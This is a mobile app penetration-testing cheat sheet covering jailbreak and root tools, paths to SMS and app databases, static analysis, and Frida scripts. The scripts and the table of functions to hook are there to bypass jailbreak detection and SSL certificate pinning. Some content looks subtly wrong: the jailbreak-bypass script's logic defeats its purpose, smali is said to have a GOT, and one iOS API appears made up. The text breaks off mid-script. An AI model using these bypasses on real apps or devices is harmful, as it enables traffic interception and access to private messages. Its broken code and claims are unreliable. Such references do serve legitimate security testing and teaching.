Table of contents
- iOS Jailbreak Methods
- Common iOS Jailbreaking Methods
- 1. Checkra1n
- 2. Unc0ver
- 3. Taurine
- 4. Electra
- 5. 3uTools
- 6. Dopamine
- Android Root Methods
- Common Android Rooting Methods
- 1. Magisk
- 2. SuperSU
- 3. KingoRoot
- 4. One Click Root
- 5. Odin (for Samsung Devices)
- Xposed Framework / EdXposed
- Installation and Usage
- Commands and Codes
- 7. DFT Pro
- Usage and Features
- Important Folders & Files
- Important Files and Folders in Android
- Application Data
- Shared Preferences
- SQLite Database
- SMS and MMS Data
- Attachments and Parts
- Samsung Messaging
- Important Files and Folders in iOS
- Application Data
- Example Detailed Paths and Files:
- Android
- iOS
- Example Database Tables and Their Significance:
- Android
- iOS
- Commands for SQLite Database Management:
- Android
- iOS
- Static Analytics
- iOS Static Analytics
- Method:
- Command and Codes (Using Hopper Disassembler):
- Android Static Analytics
- Method:
- Command and Codes (Using JADX):
- Important Global Offset Table Addresses
- Hooking
- iOS Dynamic Analytics
- Hooking Important Functions:
- Important Frida and Objection Scripts:
- Android Dynamic Analytics
- Hooking Important Functions:
- Important Frida and Objection Scripts:
- SSL Pin
- Top 10 Functions and Libraries for SSL Pinning Bypass
- Android:
- iOS:
- Root Detection
- Top 10 Libraries and Functions for Root Detection Bypass
- Android:
- iOS:
- Insecure Logging
- Android:
- iOS:
- Insecure Storage
- Android:
- iOS:
- Content Provider
- Android:
- iOS:
- Inadequate Supply Chain Security
- Android:
- iOS:
- Static Scanner
- Resources
Penetration testing applications for both iOS and Android platforms serve as invaluable tools for security professionals and ethical hackers to assess the security posture of mobile applications. These applications typically offer a range of features including dynamic analysis, static analysis, reverse engineering capabilities, network traffic interception, and vulnerability scanning. By simulating real-world attack scenarios, penetration testing applications help identify vulnerabilities such as insecure data storage, improper authentication mechanisms, insecure communication channels, and other security weaknesses that could be exploited by malicious actors. Additionally, they provide insights into potential risks and help organizations prioritize security measures to protect sensitive data and maintain the integrity of their mobile applications in an ever-evolving threat landscape.
iOS Jailbreak Methods
Jailbreaking an iOS device involves removing the software restrictions imposed by Apple, giving the user root access to the iOS file system. This makes it possible to install apps, themes, and tweaks that are not available through the official App Store. Below are some common jailbreaking methods, with the commands and steps each one involves.
| ID | Jailbreak Tool | Method | Ease of Use |
|----|----------------|--------|-------------|
| 1 | Checkra1n | Download from official website; use Terminal commands; follow on-screen DFU mode instructions | Medium |
| 2 | Unc0ver | Download IPA file; install via AltStore; open app and tap "Jailbreak" | Easy |
| 3 | Taurine | Download IPA file; install via AltStore; open app and tap "Jailbreak" | Easy |
| 4 | Electra | Download IPA file; install via Cydia Impactor; open app and tap "Jailbreak" | Medium |
| 5 | 3uTools | Download and install 3uTools on Windows; connect device and open 3uTools; navigate to "Flash & JB" tab and select "Jailbreak" | Very Easy |
| 6 | Dopamine | Download IPA file; install via AltStore; open app and tap "Jailbreak" | Easy |
Common iOS Jailbreaking Methods
- Checkra1n
- Unc0ver
- Taurine
- Electra
- 3uTools
- Dopamine
1. Checkra1n
Overview: Checkra1n is based on the checkm8 bootrom exploit and supports iOS devices from iPhone 5s to iPhone X running iOS 12.0 to iOS 14.5.
Commands and Codes:
Download Checkra1n:
- Download the latest version from the official website.
- Transfer the file to your Mac or Linux computer.
Running Checkra1n on macOS:
```sh
# Open Terminal
cd /path/to/checkra1n
sudo ./checkra1n
```
Running Checkra1n on Linux:
```sh
# Open Terminal
cd /path/to/checkra1n
sudo ./checkra1n
```
Follow On-Screen Instructions:
- Connect your iOS device via USB.
- Follow the instructions to put your device in DFU mode.
- The jailbreaking process will begin.
2. Unc0ver
Overview: Unc0ver supports a wider range of iOS versions, from iOS 11.0 to iOS 14.3, and works on newer devices compared to Checkra1n.
Commands and Codes:
Download Unc0ver:
- Get the IPA file from the official website.
Install Unc0ver via AltStore:
- Download and install AltStore on your computer.
- Connect your device and install AltServer.
- Use AltStore on your device to install the Unc0ver IPA.
Jailbreaking:
- Open the Unc0ver app on your device.
- Tap "Jailbreak" and wait for the process to complete.
3. Taurine
Overview: Taurine, developed by the Odyssey Team, supports iOS 14.0 to iOS 14.3 and is known for its speed and reliability.
Commands and Codes:
Download Taurine:
- Get the IPA file from the official website.
Install Taurine via AltStore:
- Follow the same steps as with Unc0ver to use AltStore for installation.
Jailbreaking:
- Open the Taurine app on your device.
- Tap "Jailbreak" and follow the on-screen instructions.
4. Electra
Overview: Electra is an older tool, suitable for jailbreaking iOS 11.0 to iOS 11.4.1.
Commands and Codes:
Download Electra:
- Obtain the IPA file from the official website.
Install Electra via Cydia Impactor:
- Download Cydia Impactor and connect your device.
- Drag the Electra IPA into Cydia Impactor and follow the installation steps.
Jailbreaking:
- Open the Electra app on your device.
- Tap "Jailbreak" and let the process complete.
5. 3uTools
Overview: 3uTools is a comprehensive tool for iOS devices, providing features for flashing firmware, managing files, and jailbreaking. It's a user-friendly tool that integrates several jailbreaking methods, making it easier for users to perform various tasks without needing multiple tools.
Method:
Download and Install 3uTools:
- Download the latest version of 3uTools from the official website.
- Install 3uTools on your Windows computer.
Launch 3uTools and Connect Your Device:
- Open 3uTools and connect your iOS device using a USB cable.
Jailbreaking with 3uTools:
- Navigate to the "Flash & JB" tab.
- Select "Jailbreak."
- 3uTools will automatically detect the iOS version and provide the appropriate jailbreak tool (e.g., Checkra1n, Unc0ver).
Follow On-Screen Instructions:
- Follow the prompts to enter DFU mode (if required).
- The jailbreaking process will begin and complete automatically.
Commands and Codes:
Entering DFU Mode:
- Follow the on-screen steps to put your device in DFU mode, which generally involves holding down the Power and Home/Volume buttons.
6. Dopamine
Overview: Dopamine is a modern jailbreak tool for iOS, primarily supporting newer iOS versions and devices. It's designed for ease of use and reliability.
Method:
Download Dopamine:
- Obtain the latest Dopamine IPA from the official website.
Install Dopamine via AltStore:
- Download and install AltStore on your computer (available for both macOS and Windows).
- Connect your iOS device and open AltServer.
- Use AltStore on your device to install the Dopamine IPA.
Jailbreaking:
- Open the Dopamine app on your device.
- Tap "Jailbreak" and follow the on-screen instructions.
Commands and Codes:
Installing AltStore:
- macOS:
```sh
brew install --cask altserver
```
Open AltServer and follow the instructions to install AltStore on your device.
- Windows: Download the AltServer installer from the official website and follow the installation steps.
Using AltStore:
- Connect your device via USB.
- Open AltStore on your device and select "Install AltStore."
- Select the Dopamine IPA file and follow the prompts to install it.
Android Root Methods
| ID | Root Tool | Method | Ease of Use |
|----|-----------|--------|-------------|
| 1 | KingoRoot | Download KingoRoot APK; install and run the APK; tap "One Click Root" | Very Easy |
| 2 | One Click Root | Download One Click Root software; install on PC; connect device via USB; follow on-screen instructions | Very Easy |
| 3 | Magisk | Install Magisk Manager; flash Magisk zip via custom recovery (e.g., TWRP); reboot and manage root with Magisk Manager | Easy |
| 4 | SuperSU | Download SuperSU zip; flash SuperSU zip via custom recovery (e.g., TWRP); reboot device | Easy |
| 5 | Odin (for Samsung) | Download Odin and CF-Auto-Root; boot device into Download Mode; connect to PC; use Odin to flash CF-Auto-Root | Medium |
| 6 | Xposed or EdXposed | Install Magisk; install Riru module; install EdXposed module; reboot device; manage modules with EdXposed Manager | Medium |
| 7 | DFT Pro | Install DFT Pro on PC; connect device via USB; use DFT Pro software to root device | Medium |
| 8 | Chimera | Install Chimera Tool; connect device to PC; use Chimera Tool to root device | Medium |
| 9 | Global Unlocker Pro | Install Global Unlocker Pro; connect device to PC; use software to root device | Medium |
| 10 | Pandora Box | Install Pandora Box; connect device to PC; use Pandora Box to root device | Medium |
| 11 | Infinity CM2 Dongle | Install Infinity CM2 Dongle software; connect device to PC; use software to root device | Medium |
Rooting an Android device involves gaining administrative (superuser) access to the operating system, allowing users to bypass manufacturer restrictions. This enables the installation of custom ROMs, advanced system tweaks, and specialized apps. Below are some common Android rooting methods, with the commands and steps each one involves.
Common Android Rooting Methods
- Magisk
- SuperSU
- KingoRoot
- One Click Root
- Odin (for Samsung devices)
- Xposed or EdXposed
- DFT Pro
- Chimera
- Global Unlocker Pro
- Pandora Box
- Infinity CM2 Dongle
1. Magisk
Overview: Magisk is a popular tool that allows you to root your device systemlessly, meaning it doesn't modify the system partition. This makes it easier to hide the root status from apps that detect it, like banking apps.
Commands and Codes:
Download Magisk:
- Download the latest Magisk zip and Magisk Manager APK from the official website.
Install Magisk:
- Boot your device into custom recovery (e.g., TWRP).
- In TWRP, select "Install" and choose the Magisk zip file.
- Swipe to confirm the flash.
Install Magisk Manager:
- After rebooting, install the Magisk Manager APK.
2. SuperSU
Overview: SuperSU was one of the first widespread rooting solutions, modifying the system partition to grant root access.
Commands and Codes:
Download SuperSU:
- Download the SuperSU zip file from the official website.
Install SuperSU:
- Boot your device into custom recovery (e.g., TWRP).
- In TWRP, select "Install" and choose the SuperSU zip file.
- Swipe to confirm the flash.
3. KingoRoot
Overview: KingoRoot offers a one-click root solution, available for both PC and APK versions.
Commands and Codes:
Download KingoRoot:
- Download the KingoRoot APK from the official website.
- Alternatively, download the KingoRoot PC application.
Root with KingoRoot APK:
- Install the APK on your device.
- Open KingoRoot and tap "One Click Root."
Root with KingoRoot PC:
- Install KingoRoot on your PC.
- Connect your device via USB and enable USB debugging.
- Open KingoRoot and click "Root."
4. One Click Root
Overview: One Click Root is a commercial rooting service that provides easy rooting with guaranteed support.
Commands and Codes:
Download One Click Root:
- Download the One Click Root software from the official website.
Root with One Click Root:
- Install the software on your PC.
- Connect your device via USB and enable USB debugging.
- Open One Click Root and follow the on-screen instructions.
5. Odin (for Samsung Devices)
Overview: Odin is a Samsung-specific tool used for flashing firmware, including rooting files like CF-Auto-Root.
Commands and Codes:
Download Odin and CF-Auto-Root:
- Download Odin and the CF-Auto-Root file for your device.
Prepare Your Device:
- Enable USB debugging and OEM unlock in developer options.
- Boot your device into Download Mode (Power + Volume Down + Home/Bixby).
Root with Odin:
- Open Odin on your PC.
- Connect your device via USB.
- Load the CF-Auto-Root file into Odin.
- Click "Start" to begin the flashing process.
Xposed Framework / EdXposed
Xposed Framework: The Xposed Framework is a versatile tool that allows users to modify the behavior of their Android device's OS and apps without changing the APKs or flashing custom ROMs. It operates by loading modules that can alter system and app functionalities at runtime.
EdXposed: EdXposed is an evolution of the Xposed Framework, designed to work with newer Android versions and to be compatible with the Magisk systemless root solution. It uses the Riru module to inject itself into the Android runtime environment.
Installation and Usage
Xposed Framework Installation:
Download Xposed Installer:
- Download the Xposed Installer APK from the official Xposed website or trusted sources.
Install Xposed Installer:
- Install the APK on your device.
Install Xposed Framework:
- Open the Xposed Installer app and go to the "Framework" section.
- Tap "Install/Update" to install the Xposed framework.
- Reboot your device.
EdXposed Installation:
Install Magisk:
- Follow the Magisk installation steps to ensure your device is rooted systemlessly.
Install Riru:
- Open the Magisk Manager app, go to the "Downloads" section, and install the Riru module.
Install EdXposed:
- From the Magisk Manager app, install the EdXposed module (either the YAHFA or the SandHook version).
- Reboot your device.
Install EdXposed Manager:
- Download and install the EdXposed Manager APK to manage and configure EdXposed modules.
Commands and Codes
Checking Root Status:
```sh
su
```
Using Magisk for Installation:
```sh
# Install Riru via Magisk
magisk --install-module riru.zip
# Install EdXposed via Magisk
magisk --install-module edxposed-yahfa.zip
# or
magisk --install-module edxposed-sandhook.zip
```
7. DFT Pro
DFT Pro (Digital Forensics Tool Pro): DFT Pro is a powerful forensic tool used for extracting and analyzing data from mobile devices, primarily used in legal and investigative contexts. It supports a wide range of devices, including Android and iOS, and can retrieve deleted data, call logs, messages, app data, and more.
Usage and Features
Install DFT Pro:
- Obtain the DFT Pro software from the official website or authorized distributors.
- Install the software on your computer.
Connect Device:
- Connect the target mobile device to the computer using a USB cable.
- Ensure USB debugging is enabled on Android devices and the necessary permissions are granted on iOS devices.
Data Extraction:
- Launch DFT Pro and select the connected device.
- Choose the type of data you want to extract (e.g., messages, call logs, app data).
- Initiate the extraction process.
Data Analysis:
- Use the built-in tools to analyze the extracted data.
- Generate reports and export findings for further review.
Important Folders & Files
| ID | Title | Path | Type of File |
|----|-------|------|--------------|
| 1 | Application Databases | /data/data/app_name/databases/*.sqlite, *.db | SQLite Database Files |
| 2 | Shared Preferences | /data/data/app_name/shared_prefs | XML Files |
| 3 | SMS and MMS Database | /data/com.android.providers.telephony/databases/mmssms.db | SQLite Database Files |
| 4 | MMS Attachments | /data/user_de/0/com.android.providers.telephony/app_parts | Media Files |
| 5 | Samsung Messaging Database | /data/com.samsung.android.messaging/databases/messages_content.db | SQLite Database Files |
| 6 | iOS Application Databases | /Applications/.../Library/Database | SQLite Database Files |
| 7 | iOS Application Preferences | /Applications/.../Library/Preferences | Property List (.plist) Files |
This section lists important files and folders in iOS and Android systems, focusing on the common directories and databases that store critical application and system data. It covers paths, file types, and key tables within those databases.
Important Files and Folders in Android
Application Data
Path: /data/data/app_name/databases/*.sqlite, *.db
Description: Stores SQLite database files used by apps.
Example Files:
- app_name.db
- user_data.sqlite
Shared Preferences
Path: /data/data/app_name/shared_prefs
Description: Stores XML files for app-specific shared preferences.
Example Files:
- settings.xml
- user_preferences.xml
SQLite Database
Command: sqlite3, the command-line tool for interacting with SQLite databases.
Useful Commands:
- .headers on: Show column headers in query results.
- .tables: List all tables in the database.
SMS and MMS Data
Path: /data/com.android.providers.telephony/databases/mmssms.db
Description: Database for SMS and MMS messages.
Tables of Interest:
- addr: Stores addresses related to messages.
- sms: Contains SMS message data.
- mms: Contains MMS message data.
- part: Stores parts of MMS messages, like text and attachments.
- pdu: Stores protocol data units of MMS messages.
- threads: Contains threads of conversations.
- canonical_addresses: Maps phone numbers to IDs.
Attachments and Parts
Path: /data/user_de/0/com.android.providers.telephony/app_parts
Description: Stores parts of MMS messages, such as images and other attachments.
Samsung Messaging
Path: /data/com.samsung.android.messaging/databases/messages_content.db
Description: Database specific to Samsung's messaging app.
Tables of Interest: Similar to mmssms.db but specific to Samsung's implementation.
Important Files and Folders in iOS
Application Data
Path: /Applications/.../Library/Database
Description: Stores SQLite databases for iOS applications.
Example Files:
- app_data.sqlite
- user_info.db
Example Detailed Paths and Files:
Android
App Data:
- /data/data/com.example.myapp/databases/app_data.db
- /data/data/com.example.myapp/shared_prefs/settings.xml
Telephony Data:
- /data/com.android.providers.telephony/databases/mmssms.db
- /data/user_de/0/com.android.providers.telephony/app_parts/attachment.jpg
Samsung Messaging:
- /data/com.samsung.android.messaging/databases/messages_content.db
iOS
App Data:
- /Applications/com.example.myapp/Library/Database/app_data.sqlite
- /Applications/com.example.myapp/Library/Preferences/settings.plist
Example Database Tables and Their Significance:
Android
mmssms.db:
- addr: Stores message addresses.
- sms: Stores text messages.
- mms: Stores multimedia messages.
- part: Stores individual parts of MMS messages.
- pdu: Stores protocol data units for MMS.
- threads: Manages conversation threads.
- canonical_addresses: Maps contact numbers to internal IDs.
iOS
Example Database (app_data.sqlite):
- users: Stores user information.
- messages: Stores message data.
- settings: Stores application settings.
Commands for SQLite Database Management:
Android
```sh
adb shell
sqlite3 /data/data/com.example.myapp/databases/app_data.db
```
Useful SQLite Commands:
```sql
.headers on
.tables
SELECT * FROM table_name;
```
iOS
Accessing SQLite Databases on a Jailbroken Device:
```sh
ssh root@<device-ip>
sqlite3 /Applications/com.example.myapp/Library/Database/app_data.sqlite
```
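The mmssms.db layout described above, walked with Python as an added example (not part of the original page): it builds an in-memory database with a reduced copy of the real sms, pdu, addr, part, threads and canonical_addresses tables plus constructed sample rows, resolves thread participants, and joins each MMS part to its sender and its on-disk file under app_parts. The column names and the 137/151 address-type codes are those of the Android telephony provider; the phone numbers and messages are made up.

```python
import sqlite3
from datetime import datetime, timezone

# Reduced copy of the mmssms.db layout: only the columns the queries below use.
SCHEMA = """
CREATE TABLE canonical_addresses (_id INTEGER PRIMARY KEY, address TEXT);
CREATE TABLE threads (_id INTEGER PRIMARY KEY, recipient_ids TEXT, message_count INTEGER);
CREATE TABLE sms (_id INTEGER PRIMARY KEY, thread_id INTEGER, address TEXT,
                  date INTEGER, type INTEGER, body TEXT);
CREATE TABLE pdu (_id INTEGER PRIMARY KEY, thread_id INTEGER, date INTEGER, msg_box INTEGER);
CREATE TABLE addr (_id INTEGER PRIMARY KEY, msg_id INTEGER, address TEXT, type INTEGER);
CREATE TABLE part (_id INTEGER PRIMARY KEY, mid INTEGER, ct TEXT, text TEXT, _data TEXT);
"""

# Constructed sample rows (fake numbers and content). Note the unit mismatch that
# trips up timeline tools: sms.date is in milliseconds, pdu.date is in seconds.
SAMPLE_ROWS = """
INSERT INTO canonical_addresses VALUES (1, '+15550100'), (2, '+15550199');
INSERT INTO threads VALUES (7, '1', 2), (8, '1 2', 1);
INSERT INTO sms VALUES
  (1, 7, '+15550100', 1700000000000, 1, 'Your code is 4821'),
  (2, 7, '+15550100', 1700000060000, 2, 'thanks');
INSERT INTO pdu VALUES (3, 8, 1700000120, 1);
INSERT INTO addr VALUES (1, 3, '+15550199', 137), (2, 3, 'insert-address-token', 151);
INSERT INTO part VALUES
  (1, 3, 'image/jpeg', NULL,
   '/data/user_de/0/com.android.providers.telephony/app_parts/PART_1700000120.jpg'),
  (2, 3, 'text/plain', 'see attached', NULL);
"""

SMS_TYPE = {1: "inbox", 2: "sent", 3: "draft", 4: "outbox", 5: "failed", 6: "queued"}
ADDR_FROM, ADDR_TO = 137, 151  # addr.type values: PduHeaders.FROM / PduHeaders.TO


def open_db(path=":memory:"):
    """Open a pulled mmssms.db (or an in-memory database for the sample)."""
    conn = sqlite3.connect(path)
    conn.row_factory = sqlite3.Row
    return conn


def build_sample_db():
    conn = open_db()
    conn.executescript(SCHEMA + SAMPLE_ROWS)
    return conn


def _iso(epoch_seconds):
    return datetime.fromtimestamp(epoch_seconds, tz=timezone.utc).isoformat()


def thread_participants(conn):
    """threads.recipient_ids is a space-separated list of canonical_addresses ids."""
    addresses = {r["_id"]: r["address"]
                 for r in conn.execute("SELECT _id, address FROM canonical_addresses")}
    return {r["_id"]: [addresses[int(i)] for i in r["recipient_ids"].split()]
            for r in conn.execute("SELECT _id, recipient_ids FROM threads")}


def sms_timeline(conn):
    """Every SMS in order, with sms.type decoded and the millisecond date normalised."""
    rows = conn.execute("SELECT thread_id, address, date, type, body FROM sms ORDER BY date")
    return [{"thread": r["thread_id"], "direction": SMS_TYPE.get(r["type"], "unknown"),
             "address": r["address"], "when": _iso(r["date"] / 1000), "body": r["body"]}
            for r in rows]


def mms_attachments(conn):
    """Join pdu -> addr (sender, type 137) -> part to list each MMS part and its file."""
    sql = """
    SELECT p._id AS msg_id, p.date, a.address AS sender, pt.ct, pt.text, pt._data
    FROM pdu p
    JOIN addr a ON a.msg_id = p._id AND a.type = ?
    JOIN part pt ON pt.mid = p._id
    ORDER BY p.date, pt._id
    """
    return [{"msg_id": r["msg_id"], "when": _iso(r["date"]), "sender": r["sender"],
             "content_type": r["ct"], "text": r["text"], "file": r["_data"]}
            for r in conn.execute(sql, (ADDR_FROM,))]


if __name__ == "__main__":
    db = build_sample_db()
    for msg in sms_timeline(db):
        print(msg)
    for att in mms_attachments(db):
        print(att)
    print(thread_participants(db))
```

On a real extraction, pass the path of the pulled mmssms.db to open_db() and run the same three queries.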
Static Analytics
Static analysis of iOS and Android applications involves examining the code and resources of an app without executing it. Important elements to analyze include the Global Offset Table (GOT), which holds addresses of functions and variables used in the application. Here's an overview of static analytics for both platforms, including methods and relevant commands:
iOS Static Analytics
Method:
Decompile the App:
- Use tools like Hopper, IDA Pro, or Ghidra to decompile the iOS application binary (Mach-O file).
Analyze the Global Offset Table (GOT):
Locate the GOT in the disassembled code.
Identify important addresses, such as function calls, library references, and variable access points.
Extract Strings and Resources:
Extract strings and resources from the binary for further analysis.
Look for sensitive information, API endpoints, and hardcoded values.
Command and Codes (Using Hopper Disassembler):
Decompile Binary:
```sh
hopper disassemble -64 -o <output_directory> <app_binary_path>
```
Analyze GOT:
- Use Hopper's GUI to navigate to the Global Offset Table section and examine the addresses.
Extract Strings:
- Hopper provides a built-in feature to extract strings from the disassembled code.
Android Static Analytics
Method:
Decompile the APK:
- Use tools like JADX, apktool, or JADX-GUI to decompile the Android APK file.
Inspect Smali Code:
Explore the smali code to understand the application's structure and functionality.
Locate the Global Offset Table (GOT) equivalent in Android, which contains method and class references.
Extract Resources:
- Extract resources, such as XML files, layouts, and strings, for analysis.
Command and Codes (Using JADX):
Decompile APK:
```sh
jadx -d <output_directory> <apk_file>
```
Inspect Smali Code:
- Navigate to the smali directory in the output directory to explore the decompiled smali files.
- Search for relevant sections related to the GOT.
Extract Resources:
- Use JADX's built-in feature to extract XML files, layouts, and strings for further analysis.
Important Global Offset Table Addresses
iOS:
- In iOS, the Global Offset Table (GOT) is part of the Mach-O binary format.
- Addresses in the GOT typically point to external functions and variables.
- Example: 0x10001000, an address pointing to a function in a shared library.
Android:
- In Android, the GOT equivalent is represented in the smali code.
- Addresses point to method and class references used by the application.
- Example: Lcom/example/MainActivity;->onCreate(Landroid/os/Bundle;)V, a reference to the onCreate method of the MainActivity class.
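As an added example (not from the original page), the smali method-reference format shown above is parsed into readable Java signatures and then used to flag the calls a static review should look at first. The smali excerpt and the watch list are constructed for illustration; the watch list picks up the Runtime.exec / File.exists probes listed under Root Detection and the Log calls discussed under Insecure Logging later on this page.

```python
import re

# Dalvik primitive type descriptors
PRIMITIVES = {"V": "void", "Z": "boolean", "B": "byte", "S": "short", "C": "char",
              "I": "int", "J": "long", "F": "float", "D": "double"}


def parse_type(desc, pos=0):
    """Parse one type descriptor starting at desc[pos]; return (java_name, next_pos)."""
    dims = 0
    while desc[pos] == "[":          # array prefix, one '[' per dimension
        dims += 1
        pos += 1
    c = desc[pos]
    if c in PRIMITIVES:
        name, pos = PRIMITIVES[c], pos + 1
    elif c == "L":                    # object type: Lpkg/Name; -> pkg.Name
        end = desc.index(";", pos)
        name, pos = desc[pos + 1:end].replace("/", "."), end + 1
    else:
        raise ValueError("bad type descriptor at %d in %r" % (pos, desc))
    return name + "[]" * dims, pos


def parse_params(desc):
    """Parameter list between the parentheses: descriptors run together, no separator."""
    params, pos = [], 0
    while pos < len(desc):
        name, pos = parse_type(desc, pos)
        params.append(name)
    return params


METHOD_REF = re.compile(r"^(?P<cls>\[*L[^;]+;)->(?P<name>[^(]+)\((?P<params>[^)]*)\)(?P<ret>.+)$")


def parse_method_ref(ref):
    """Lcom/example/MainActivity;->onCreate(Landroid/os/Bundle;)V -> its parts."""
    m = METHOD_REF.match(ref)
    if not m:
        raise ValueError("not a method reference: %r" % ref)
    return {"class": parse_type(m.group("cls"))[0], "method": m.group("name"),
            "params": parse_params(m.group("params")), "returns": parse_type(m.group("ret"))[0]}


def java_signature(ref):
    p = parse_method_ref(ref)
    return "%s %s.%s(%s)" % (p["returns"], p["class"], p["method"], ", ".join(p["params"]))


# Illustrative watch list (not exhaustive): calls worth a closer look in a review.
WATCHLIST = {
    "java.lang.Runtime.exec": "process execution (root probing or command sink)",
    "java.io.File.exists": "file probing (su binary / root artefact check)",
    "android.util.Log.d": "debug logging (possible sensitive data in logcat)",
}

INVOKE = re.compile(r"^\s*invoke-\w+(?:/range)?\s+\{[^}]*\},\s+(?P<ref>\S+)")


def scan_smali(lines):
    """Return every invoke-* whose target is on the watch list, with line numbers."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = INVOKE.match(line)
        if not m:
            continue
        p = parse_method_ref(m.group("ref"))
        key = p["class"] + "." + p["method"]
        if key in WATCHLIST:
            hits.append({"line": n, "signature": java_signature(m.group("ref")),
                         "reason": WATCHLIST[key]})
    return hits


# Constructed smali excerpt (not from a real app) in the form apktool/baksmali emit.
SAMPLE_SMALI = """\
.method protected onCreate(Landroid/os/Bundle;)V
    .locals 3
    invoke-super {p0, p1}, Landroidx/appcompat/app/AppCompatActivity;->onCreate(Landroid/os/Bundle;)V
    invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
    move-result-object v0
    const-string v1, "which su"
    invoke-virtual {v0, v1}, Ljava/lang/Runtime;->exec(Ljava/lang/String;)Ljava/lang/Process;
    const-string v1, "Auth"
    invoke-static {v1, v2}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
    return-void
.end method
"""

if __name__ == "__main__":
    print(java_signature("Lcom/example/MainActivity;->onCreate(Landroid/os/Bundle;)V"))
    for hit in scan_smali(SAMPLE_SMALI.splitlines()):
        print("line %(line)d: %(signature)s  <- %(reason)s" % hit)
```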
Hooking
Dynamic analysis of iOS and Android applications involves inspecting and manipulating the behavior of the app during runtime. Hooking important functions and using Frida and objection scripts are common techniques for dynamic analytics. Here's an overview, including methods, important scripts, and their applications:
iOS Dynamic Analytics
Hooking Important Functions:
Using Cydia Substrate or Substitute:
Hook into important functions using Substrate or Substitute, allowing you to intercept and modify behavior.
Common hooks include method swizzling, function interception, and dynamic class modification.
Frida Scripting:
- Use Frida to dynamically hook into iOS applications, enabling real-time function interception and manipulation.
Important Frida and Objection Scripts:
- Frida Script to Bypass Jailbreak Detection:
```javascript
// JavaScript code to bypass jailbreak detection
Interceptor.attach(Module.findExportByName(null, "open"), {
  onEnter: function (args) {
    console.log("Bypassing jailbreak detection...");
    // keep a reference on `this` so the allocation outlives onEnter
    this.newPath = Memory.allocUtf8String("/private/var/lib/apt/");
    args[0] = this.newPath;
  }
});
```
Frida Script to Trace Objective-C Method Calls:
```javascript
// JavaScript code to trace Objective-C method calls
function traceObjC(className) {
  var cls = ObjC.classes[className];
  // $ownMethods is an array of selector strings, so iterate its values, not its indices
  cls.$ownMethods.forEach(function (methodName) {
    var method = cls[methodName];
    console.log("Tracing: " + className + " " + methodName);
    try {
      var original = method.implementation;
      // ObjC.implement wraps a JS function as a native IMP with the method's
      // signature; the first two native arguments are self and the selector
      method.implementation = ObjC.implement(method, function (...args) {
        console.log(className + " " + methodName + " called with arguments: " + args.slice(2).join(", "));
        return original(...args);
      });
    } catch (e) {
      console.error("Error tracing " + className + " " + methodName + ": " + e);
    }
  });
}
```
Android Dynamic Analytics
Hooking Important Functions:
Using Xposed Framework:
Create Xposed modules to hook into Android applications and modify their behavior.
Hooks can intercept method calls, access private variables, and manipulate UI elements.
Frida Scripting:
- Utilize Frida to dynamically hook into Android applications, providing real-time function interception and manipulation.
Important Frida and Objection Scripts:
- Frida Script to Bypass SSL Pinning:
```javascript
// JavaScript code to bypass SSL pinning
Java.perform(function () {
  var CertificatePinner = Java.use("okhttp3.CertificatePinner");
  CertificatePinner.check.overload('java.lang.String', 'java.util.List').implementation = function () {
    console.log("[*] Bypassing SSL pinning");
  };
});
```
Frida Script to Trace Java Method Calls:
```javascript
// JavaScript code to trace Java method calls
Java.perform(function () {
  var targetClass = Java.use("com.example.MainActivity");
  // the replacement must take the same parameters as the Java method
  targetClass.onCreate.implementation = function (savedInstanceState) {
    console.log("onCreate() called");
    this.onCreate(savedInstanceState);
  };
});
```
SSL Pin
| ID | Function/Library Name | Popularity |
|----|-----------------------|------------|
| 1 | okhttp3.CertificatePinner.check (Android) | High |
| 2 | javax.net.ssl.X509TrustManager.checkServerTrusted (Android) | High |
| 3 | javax.net.ssl.SSLContext.init (Android) | High |
| 4 | android.webkit.WebViewClient.onReceivedSslError (Android) | High |
| 5 | javax.net.ssl.HttpsURLConnection.setSSLSocketFactory (Android) | High |
| 6 | NSURLSessionDelegate.URLSession:didReceiveChallenge:completionHandler: (iOS) | High |
| 7 | NSURLConnectionDelegate.connection:didReceiveAuthenticationChallenge: (iOS) | High |
| 8 | CFReadStreamSetProperty (iOS) | High |
| 9 | NSURLRequest.allowsAnyHTTPSCertificateForHost (iOS) | High |
| 10 | SecTrustEvaluateWithError (iOS) | High |
| 11 | org.apache.http.impl.client.DefaultHttpClient (Android) | Medium |
| 12 | CFNetwork (iOS) | Medium |
| 13 | javax.net.ssl.HostnameVerifier.verify (Android) | Medium |
| 14 | okhttp3.OkHttpClient.Builder.sslSocketFactory (Android) | Medium |
| 15 | java.net.URL.openConnection (Android) | Medium |
| 16 | NSURLRequest.allowEgress (iOS) | Medium |
| 17 | SSLContext.getInstance (Android) | Medium |
| 18 | NSURLProtectionSpace.authenticationMethod (iOS) | Low |
| 19 | SSLContext.getInstance("TLS") (Android) | Low |
| 20 | NSURLSession:canAuthenticateAgainstProtectionSpace: (iOS) | Low |
Below are the functions and libraries commonly hooked with Frida and Objection to bypass SSL pinning in Android and iOS applications:
Top 10 Functions and Libraries for SSL Pinning Bypass
Android:
- OkHttp (Android): library okhttp3; functions to hook: CertificatePinner.check, SSLContext.getInstance
- TrustManager (Android): library javax.net.ssl; function to hook: X509TrustManager.checkServerTrusted
- HttpClient (Android): library org.apache.http.impl.client.DefaultHttpClient; function to hook: SSLContext.init
- WebView (Android): library android.webkit; function to hook: WebViewClient.onReceivedSslError
- HttpsURLConnection (Android): library javax.net.ssl; function to hook: HttpsURLConnection.setSSLSocketFactory
iOS:
- NSURLSession (iOS): library Foundation; function to hook: -[NSURLSessionDelegate URLSession:didReceiveChallenge:completionHandler:]
- NSURLConnection (iOS): library Foundation; function to hook: -[NSURLConnectionDelegate connection:didReceiveAuthenticationChallenge:]
- CFNetwork (iOS): library CFNetwork; function to hook: CFReadStreamSetProperty
- NSURLRequest (iOS): library Foundation; function to hook: -[NSURLRequest allowsAnyHTTPSCertificateForHost:]
- SecTrustEvaluate (iOS): library Security; function to hook: SecTrustEvaluateWithError
Frida and Objection scripts to hook the CertificatePinner.check method in the OkHttp library, commonly used for SSL pinning in Android applications:
```javascript
// Android SSL pinning hook with Frida
// CertificatePinner.check is a Java method, so it is hooked through the Java bridge;
// Module.findExportByName only sees native (JNI) exports and would return null here.
Java.perform(function () {
  var CertificatePinner = Java.use("okhttp3.CertificatePinner");
  CertificatePinner.check.overload('java.lang.String', 'java.util.List')
    .implementation = function (hostname, peerCertificates) {
      console.log("[*] CertificatePinner.check() hooked!");
